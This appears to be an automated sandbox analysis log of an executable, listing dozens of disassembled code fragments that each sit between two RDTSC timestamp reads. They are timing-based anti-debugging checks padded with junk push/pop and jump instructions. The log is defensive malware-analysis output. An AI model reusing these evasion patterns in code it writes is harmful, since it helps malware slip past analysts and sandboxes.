Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D0DC2B second address: D0DC43 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 jmp 00007F1BE4ECC06Ah 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D0DC43 second address: D0DC4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D0DC4C second address: D0DC52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D1266C second address: D12674 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D12674 second address: D1267A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D12BF7 second address: D12C0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jl 00007F1BE47673C8h 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f jnp 00007F1BE47673C6h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D12C0C second address: D12C23 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1BE4ECC06Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jns 00007F1BE4ECC066h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D12D90 second address: D12D96 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D12D96 second address: D12D9A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D12D9A second address: D12DA8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CC1CF1 second address: CC1D5F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1BE4ECC076h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F1BE4ECC06Ch 0x0000000f nop 0x00000010 push 00000000h 0x00000012 push edx 0x00000013 call 00007F1BE4ECC068h 0x00000018 pop edx 0x00000019 mov dword ptr [esp+04h], edx 0x0000001d add dword ptr [esp+04h], 00000015h 0x00000025 inc edx 0x00000026 push edx 0x00000027 ret 0x00000028 pop edx 0x00000029 ret 0x0000002a jne 00007F1BE4ECC069h 0x00000030 push 00000004h 0x00000032 ja 00007F1BE4ECC06Ch 0x00000038 mov edi, dword ptr [ebp+122D3C52h] 0x0000003e nop 0x0000003f push eax 0x00000040 push edx 0x00000041 pushad 0x00000042 jnl 00007F1BE4ECC066h 0x00000048 push eax 0x00000049 push edx 0x0000004a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CC1D5F second address: CC1D64 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CC1D64 second address: CC1D77 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1BE4ECC06Fh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CC1D77 second address: CC1D9C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1BE47673D5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d js 00007F1BE47673CCh 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D13053 second address: D1305D instructions: 0x00000000 rdtsc 0x00000002 js 00007F1BE4ECC072h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D1305D second address: D13063 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D174BE second address: D174C2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D174C2 second address: D174C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D1F6F1 second address: D1F713 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F1BE4ECC066h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d pushad 0x0000000e popad 0x0000000f jmp 00007F1BE4ECC06Bh 0x00000014 popad 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D1F713 second address: D1F719 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D1F719 second address: D1F74D instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F1BE4ECC066h 0x00000008 jmp 00007F1BE4ECC075h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jmp 00007F1BE4ECC075h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D1FA00 second address: D1FA20 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1BE47673D4h 0x00000007 push eax 0x00000008 push edx 0x00000009 jnc 00007F1BE47673C6h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D1FA20 second address: D1FA24 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D1FA24 second address: D1FA2A instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D2020F second address: D20213 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D20213 second address: D20217 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D20217 second address: D2022E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jo 00007F1BE4ECC066h 0x0000000d pushad 0x0000000e popad 0x0000000f jnl 00007F1BE4ECC066h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D2022E second address: D2023B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 ja 00007F1BE47673C6h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D2023B second address: D2028A instructions: 0x00000000 rdtsc 0x00000002 je 00007F1BE4ECC066h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jo 00007F1BE4ECC066h 0x00000011 jmp 00007F1BE4ECC073h 0x00000016 je 00007F1BE4ECC066h 0x0000001c popad 0x0000001d popad 0x0000001e push edi 0x0000001f pushad 0x00000020 pushad 0x00000021 popad 0x00000022 push edi 0x00000023 pop edi 0x00000024 pushad 0x00000025 popad 0x00000026 popad 0x00000027 push eax 0x00000028 push edx 0x00000029 jmp 00007F1BE4ECC078h 0x0000002e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D20579 second address: D2057D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D20834 second address: D2083B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D20AE3 second address: D20AE7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D29E35 second address: D29E45 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1BE4ECC06Ah 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D29E45 second address: D29E52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 je 00007F1BE47673C8h 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D29E52 second address: D29E57 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D2A3F8 second address: D2A3FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D2A3FC second address: D2A401 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D2A401 second address: D2A407 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D2A407 second address: D2A40F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D2A40F second address: D2A417 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D2A6DC second address: D2A6F9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F1BE4ECC078h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D2A6F9 second address: D2A705 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F1BE47673C6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D2A852 second address: D2A875 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jp 00007F1BE4ECC082h 0x0000000b jmp 00007F1BE4ECC076h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D2C2ED second address: D2C2F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D2C2F1 second address: D2C2F5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D2C2F5 second address: D2C2FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D3597E second address: D3599A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 jl 00007F1BE4ECC080h 0x0000000d jnl 00007F1BE4ECC06Ch 0x00000013 push ecx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D33B02 second address: D33B30 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F1BE47673D2h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jne 00007F1BE47673C8h 0x00000011 push eax 0x00000012 push edx 0x00000013 jo 00007F1BE47673C6h 0x00000019 jne 00007F1BE47673C6h 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D33C9E second address: D33CA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D33CA3 second address: D33CC8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnl 00007F1BE47673C6h 0x00000009 jg 00007F1BE47673C6h 0x0000000f push eax 0x00000010 pop eax 0x00000011 popad 0x00000012 pushad 0x00000013 jns 00007F1BE47673C6h 0x00000019 jmp 00007F1BE47673CAh 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D33CC8 second address: D33CD5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edx 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D33CD5 second address: D33CDD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D344EA second address: D3450C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F1BE4ECC066h 0x0000000a popad 0x0000000b popad 0x0000000c pushad 0x0000000d jmp 00007F1BE4ECC071h 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D348FE second address: D34918 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F1BE47673D3h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D34918 second address: D34939 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a jnp 00007F1BE4ECC066h 0x00000010 pushad 0x00000011 popad 0x00000012 push edi 0x00000013 pop edi 0x00000014 popad 0x00000015 jno 00007F1BE4ECC06Ch 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D3B159 second address: D3B15D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D3B15D second address: D3B19F instructions: 0x00000000 rdtsc 0x00000002 js 00007F1BE4ECC066h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop esi 0x0000000b jl 00007F1BE4ECC0A9h 0x00000011 jp 00007F1BE4ECC077h 0x00000017 pushad 0x00000018 jmp 00007F1BE4ECC075h 0x0000001d push edi 0x0000001e pop edi 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D460CF second address: D460E1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 jbe 00007F1BE47673C6h 0x0000000f push edi 0x00000010 pop edi 0x00000011 pop ecx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D460E1 second address: D4612D instructions: 0x00000000 rdtsc 0x00000002 jg 00007F1BE4ECC06Eh 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a jg 00007F1BE4ECC066h 0x00000010 jno 00007F1BE4ECC06Ch 0x00000016 pop edx 0x00000017 pop eax 0x00000018 pushad 0x00000019 jng 00007F1BE4ECC089h 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 popad 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D4988C second address: D498B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F1BE47673C6h 0x0000000a jmp 00007F1BE47673CEh 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F1BE47673CCh 0x00000017 push edx 0x00000018 pop edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D498B5 second address: D498B9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D498B9 second address: D498C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jnc 00007F1BE47673C6h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D498C7 second address: D498CB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D49426 second address: D4942A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D4942A second address: D49430 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D49430 second address: D49451 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jns 00007F1BE47673C6h 0x0000000d jno 00007F1BE47673C6h 0x00000013 push edi 0x00000014 pop edi 0x00000015 popad 0x00000016 pushad 0x00000017 pushad 0x00000018 popad 0x00000019 jnl 00007F1BE47673C6h 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D49451 second address: D49477 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F1BE4ECC071h 0x0000000c jmp 00007F1BE4ECC06Eh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D5B16F second address: D5B17D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 ja 00007F1BE47673C6h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D5B17D second address: D5B181 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D5B181 second address: D5B1B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnc 00007F1BE47673DFh 0x0000000c popad 0x0000000d push esi 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 js 00007F1BE47673C6h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D64F47 second address: D64F4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D64F4D second address: D64F60 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1BE47673CDh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D64F60 second address: D64F78 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 ja 00007F1BE4ECC066h 0x0000000b jc 00007F1BE4ECC066h 0x00000011 push edi 0x00000012 pop edi 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D64F78 second address: D64F7E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D64F7E second address: D64F82 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D64F82 second address: D64F88 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D63B42 second address: D63B48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D63C77 second address: D63C7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D63C7B second address: D63C81 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D63C81 second address: D63C8A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D63C8A second address: D63CA9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1BE4ECC079h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D67C79 second address: D67C83 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F1BE47673CCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D679C0 second address: D679C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D78A88 second address: D78A8E instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D78A8E second address: D78AB3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F1BE4ECC072h 0x0000000b push eax 0x0000000c push ebx 0x0000000d push edi 0x0000000e pop edi 0x0000000f pop ebx 0x00000010 jo 00007F1BE4ECC072h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D7A332 second address: D7A33C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 push esi 0x00000007 pop esi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D7A33C second address: D7A360 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push edx 0x00000007 pop edx 0x00000008 popad 0x00000009 pushad 0x0000000a jg 00007F1BE4ECC066h 0x00000010 jmp 00007F1BE4ECC072h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D87836 second address: D87847 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b jnp 00007F1BE47673C6h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D87847 second address: D8784B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D8A6F6 second address: D8A6FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D8A6FA second address: D8A6FE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D8A6FE second address: D8A708 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push esi 0x00000009 pop esi 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D8A708 second address: D8A719 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F1BE4ECC066h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DA296B second address: DA296F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DA296F second address: DA2975 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DA2DAB second address: DA2DAF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DA2DAF second address: DA2DB3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DA3343 second address: DA3349 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
